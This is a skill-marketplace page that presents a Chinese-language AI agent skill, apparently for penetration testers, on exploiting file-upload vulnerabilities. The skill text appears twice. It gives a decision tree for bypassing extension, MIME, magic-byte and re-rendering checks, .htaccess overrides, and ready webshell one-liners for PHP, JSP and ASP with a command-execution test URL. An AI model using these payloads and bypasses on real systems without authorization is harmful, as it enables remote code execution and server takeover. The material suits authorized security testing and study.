Adoption

Agent Skills are supported by leading AI development tools.

VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory

wgpsec/file-upload-methodology

Name: file-upload-methodology
Author: wgpsec

skills/exploit/web-method/file-upload-methodology/SKILL.md

npx skillsauth add wgpsec/AboutSecurity file-upload-methodology

Clean

TrivyContainer and dependency vulnerability scanner

Clean

SemgrepStatic code analysis for vulnerabilities

Clean

mcp-scan (Snyk)Model Context Protocol security validation

Skipped

Snyk (dep)Open source security scanning

Skipped

Socket.devSupply chain security analysis

Skipped

VirusTotalMulti-engine malware detection

Skipped

CrowdStrikeAdvanced threat intelligence

Skipped

OSV-ScannerOpen Source Vulnerability database check

Skipped

OWASP Dep-Check

文件上传漏洞方法论

⛔ 深入参考（必读）

需要扩展名/Content-Type/Magic Bytes 绕过详解、路径穿越、.htaccess 覆盖、.user.ini 利用、图片马二次渲染绕过、ZIP 解压利用 → references/upload-bypass.md

Phase 0: 上传功能发现与分析（最先执行！）

寻找 <form enctype="multipart/form-data"> 或 <input type="file">
常见端点：/upload, /api/upload, /avatar, /import
关键收集：允许的文件类型、上传后存储路径、服务器技术栈（PHP/Java/Python）

陷阱：前端 JS 验证可以直接绕过，真正的限制在后端。

Phase 1: 基础上传测试

先上传正常文件（.txt）确认功能正常，记录返回的文件路径
访问上传的文件 URL — 确认可访问
上传 .php 文件，观察是否被拒绝

路径猜解：/uploads/, /upload/, /files/, /static/uploads/, /images/

Phase 2: 绕过决策树

上传被拒绝？
├─ 扩展名限制（黑名单）→ .phtml/.php5/大小写/.php./双写 → [references/upload-bypass.md](references/upload-bypass.md)
├─ 扩展名限制（白名单）→ .htaccess 覆盖（Apache）或 .user.ini（通用）→ [references/upload-bypass.md](references/upload-bypass.md)
├─ Content-Type 限制 → 改为 image/jpeg
├─ 文件头检查 → GIF89a + webshell
├─ 二次渲染检查 → 图片马（GIF 优先）→ [references/upload-bypass.md](references/upload-bypass.md)
└─ 三层都限制 → 组合绕过：扩展名 + Content-Type + 文件头

Phase 3: Webshell Payload

PHP（最常见）：

<?php system($_GET['cmd']); ?>

精简版（绕过关键字）：<?=$_GET[1]?>

JSP: <%Runtime.getRuntime().exec(request.getParameter("cmd"));%> ASP: <%eval request("cmd")%>

上传后验证

http://target/uploads/shell.php?cmd=id

陷阱：访问 .php 返回源代码 → 该目录禁止执行，需要路径穿越或 .htaccess。

注意事项

上传成功 ≠ 可利用：必须访问验证执行
服务端可能 hash 重命名：从响应中获取新文件名
记录每次尝试的扩展名和响应：快速排除无效绕过

.htaccess 攻击

两步法：先上传 .htaccess 配置 PHP 解析规则，再上传 shell.jpg

上传≠执行

上传成功不代表能利用（上传≠执行），需要确认文件可被访问和解析
配合文件包含（LFI）等其他漏洞执行上传的 webshell

wgpsec/file-upload-methodology

skills/exploit/web-method/file-upload-methodology/SKILL.md

任意文件上传的检测、绕过和利用。当目标有上传功能(头像、附件、导入)、multipart表单、文件管理接口时使用。包含扩展名/Content-Type/Magic Bytes三层绕过、.htaccess覆盖、.user.ini+auto_prepend_file、图片马二次渲染绕过、ZIP解压利用、上传路径猜解方法

1,345 stars

content-media

Updated May 22, 2026

$ install --global

skillsauth

npx skillsauth add wgpsec/AboutSecurity file-upload-methodology

Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.

Security Scan Results

3 of 9 scanners reported clean

Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.

Scanners Passed

Scanners in report

Clean

TrivyContainer and dependency vulnerability scanner

95%

Clean

SemgrepStatic code analysis for vulnerabilities

95%

Clean

mcp-scan (Snyk)Model Context Protocol security validation

95%

Skipped

Snyk (dep)Open source security scanning

50%

Skipped

Socket.devSupply chain security analysis

50%

Skipped

VirusTotalMulti-engine malware detection

50%

Skipped

CrowdStrikeAdvanced threat intelligence

50%

Skipped

OSV-ScannerOpen Source Vulnerability database check

50%

Skipped

OWASP Dep-Check

50%

Last scanned: May 22, 2026, 2:20 AM126.3s4 files scanned

SKILL.md

name:: file-upload-methodology
description:: 任意文件上传的检测、绕过和利用。当目标有上传功能(头像、附件、导入)、multipart表单、文件管理接口时使用。包含扩展名/Content-Type/Magic Bytes三层绕过、.htaccess覆盖、.user.ini+auto_prepend_file、图片马二次渲染绕过、ZIP解压利用、上传路径猜解方法
tags:: arbitrary_file_upload,file upload,webshell,bypass,path-traversal,rce,upload,multipart,Content-Type绕过,双扩展名,MIME,文件上传,avatar,头像,attachment,附件,import,导入,图片上传,image upload
category:: exploit

文件上传漏洞方法论

⛔ 深入参考（必读）

需要扩展名/Content-Type/Magic Bytes 绕过详解、路径穿越、.htaccess 覆盖、.user.ini 利用、图片马二次渲染绕过、ZIP 解压利用 → references/upload-bypass.md

Phase 0: 上传功能发现与分析（最先执行！）

寻找 <form enctype="multipart/form-data"> 或 <input type="file">
常见端点：/upload, /api/upload, /avatar, /import
关键收集：允许的文件类型、上传后存储路径、服务器技术栈（PHP/Java/Python）

陷阱：前端 JS 验证可以直接绕过，真正的限制在后端。

Phase 1: 基础上传测试

先上传正常文件（.txt）确认功能正常，记录返回的文件路径
访问上传的文件 URL — 确认可访问
上传 .php 文件，观察是否被拒绝

路径猜解：/uploads/, /upload/, /files/, /static/uploads/, /images/

Phase 2: 绕过决策树

上传被拒绝？
├─ 扩展名限制（黑名单）→ .phtml/.php5/大小写/.php./双写 → [references/upload-bypass.md](references/upload-bypass.md)
├─ 扩展名限制（白名单）→ .htaccess 覆盖（Apache）或 .user.ini（通用）→ [references/upload-bypass.md](references/upload-bypass.md)
├─ Content-Type 限制 → 改为 image/jpeg
├─ 文件头检查 → GIF89a + webshell
├─ 二次渲染检查 → 图片马（GIF 优先）→ [references/upload-bypass.md](references/upload-bypass.md)
└─ 三层都限制 → 组合绕过：扩展名 + Content-Type + 文件头

Phase 3: Webshell Payload

PHP（最常见）：

<?php system($_GET['cmd']); ?>

精简版（绕过关键字）：<?=$_GET[1]?>

JSP: <%Runtime.getRuntime().exec(request.getParameter("cmd"));%> ASP: <%eval request("cmd")%>

上传后验证

http://target/uploads/shell.php?cmd=id

陷阱：访问 .php 返回源代码 → 该目录禁止执行，需要路径穿越或 .htaccess。

注意事项

上传成功 ≠ 可利用：必须访问验证执行
服务端可能 hash 重命名：从响应中获取新文件名
记录每次尝试的扩展名和响应：快速排除无效绕过

.htaccess 攻击

两步法：先上传 .htaccess 配置 PHP 解析规则，再上传 shell.jpg

上传≠执行

上传成功不代表能利用（上传≠执行），需要确认文件可被访问和解析
配合文件包含（LFI）等其他漏洞执行上传的 webshell

Related Skills

wgpsec/azure-pentesting

testing

VerifiedTrustedCommunity

Azure 云环境渗透测试总体方法论。当目标使用 Azure/Microsoft 365/Entra ID、发现 Azure 相关资产（Blob Storage/App Service/Azure VM/Azure Functions）、获取 Azure 凭据（Service Principal/Managed Identity/Access Token）、或需要对 Azure 环境进行安全评估时使用。提供从未授权枚举到 Entra ID 攻击、服务提权、Cloud-to-OnPrem 横向移动的全流程决策树。覆盖 35+ Azure 服务攻击面

1,393SKILL.mdUpdated Apr 24, 2026

wgpsec/azure-pentesting

wgpsec/mythic-c2

tools

VerifiedTrustedCommunity

Mythic C2 操作方法论。当需要部署 Mythic、选择 Mythic Agent、安装 C2 Profile、配置 HTTP/DNS/WebSocket/SMB/TCP 通信、生成 payload、管理回连任务，或把 Mythic 作为跨平台 C2 框架用于授权红队演练时使用。覆盖 mythic-cli 安装、Agent/Profile 选择、SSL 证书配置、payload 构建和基础 OPSEC 判断

1,345SKILL.mdUpdated May 22, 2026

wgpsec/docker-pentesting

development

VerifiedTrustedCommunity

Docker 安全测试与容器渗透方法论。当需要评估 Docker 容器、Docker Daemon、Docker Registry、镜像层、构建产物或容器逃逸风险时使用。覆盖容器环境识别、特权容器逃逸、docker.sock/Remote API 利用、procfs/cgroup/capabilities 滥用、Docker 用户组提权、运行时/内核 CVE、Registry 枚举、镜像层 Secret 分析和构建上下文泄露。发现 Docker 容器环境、Registry 暴露、镜像凭据或容器配置错误时应使用此技能

1,345SKILL.mdUpdated May 22, 2026

wgpsec/docker-pentesting

wgpsec/padbuster-padding-oracle

development

VerifiedTrustedCommunity

使用 PadBuster 进行 Padding Oracle 攻击。当发现 Web 应用使用 CBC 模式加密且存在 Padding Oracle 漏洞时使用。PadBuster 可自动解密密文和伪造任意明文对应的合法密文，适用于加密 Cookie/Token/URL 参数。任何涉及 Padding Oracle 攻击、CBC 密文解密、Cookie 伪造的场景都应使用此技能

1,345SKILL.mdUpdated May 6, 2026

wgpsec/padbuster-padding-oracle

Download

For Claude Desktop. Download once, then upload the file in the app — no terminal needed.

Need help? View full Cowork setup guide →

Install manually

Choose your platform

# Clone the repo
git clone https://github.com/wgpsec/AboutSecurity.git

# Copy into Claude Code skills folder (global)
cp -r AboutSecurity/skills/exploit/web-method/file-upload-methodology ~/.claude/skills/

Claude Code Skills — official skills path docs.

Repository

wgpsec/AboutSecurity

1,345 stars

Compatible with

Claude Code

OpenAI Codex CLI

ChatGPT